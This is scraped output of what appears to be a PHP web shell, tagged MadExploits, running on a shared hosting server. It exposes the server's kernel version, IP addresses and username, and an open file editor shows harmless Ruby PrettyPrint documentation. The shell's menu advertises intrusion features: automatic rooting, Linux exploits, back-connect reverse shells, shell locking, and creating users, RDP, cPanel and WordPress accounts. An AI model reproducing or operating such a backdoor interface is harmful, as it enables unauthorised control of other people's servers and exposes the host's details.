Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
PrettyPrint /
[ HOME SHELL ]
Name
Size
Permission
Action
Breakable
[ DIR ]
drwxr-xr-x
Group
[ DIR ]
drwxr-xr-x
GroupQueue
[ DIR ]
drwxr-xr-x
SingleLine
[ DIR ]
drwxr-xr-x
Text
[ DIR ]
drwxr-xr-x
break_outmost_groups-i.yaml
199
B
-rw-r--r--
breakable-i.yaml
672
B
-rw-r--r--
cdesc-PrettyPrint.yaml
3.13
KB
-rw-r--r--
current_group-i.yaml
185
B
-rw-r--r--
fill_breakable-i.yaml
212
B
-rw-r--r--
first%3f-i.yaml
657
B
-rw-r--r--
flush-i.yaml
228
B
-rw-r--r--
format-c.yaml
500
B
-rw-r--r--
group-i.yaml
765
B
-rw-r--r--
group_sub-i.yaml
188
B
-rw-r--r--
nest-i.yaml
313
B
-rw-r--r--
new-c.yaml
1.11
KB
-rw-r--r--
singleline_format-c.yaml
628
B
-rw-r--r--
text-i.yaml
385
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : new-c.yaml
--- !ruby/object:RI::MethodDescription aliases: [] block_params: comment: - !ruby/struct:SM::Flow::P body: Creates a buffer for pretty printing. - !ruby/struct:SM::Flow::P body: <tt>output</tt> is an output target. If it is not specified, '' is assumed. It should have a << method which accepts the first argument <tt>obj</tt> of PrettyPrint#text, the first argument <tt>sep</tt> of PrettyPrint#breakable, the first argument <tt>newline</tt> of PrettyPrint.new, and the result of a given block for PrettyPrint.new. - !ruby/struct:SM::Flow::P body: <tt>maxwidth</tt> specifies maximum line length. If it is not specified, 79 is assumed. However actual outputs may overflow <tt>maxwidth</tt> if long non-breakable texts are provided. - !ruby/struct:SM::Flow::P body: <tt>newline</tt> is used for line breaks. "\n" is used if it is not specified. - !ruby/struct:SM::Flow::P body: The block is used to generate spaces. {|width| ' ' * width} is used if it is not given. full_name: PrettyPrint::new is_singleton: true name: new params: (output='', maxwidth=79, newline="\n", &genspace) visibility: public
Close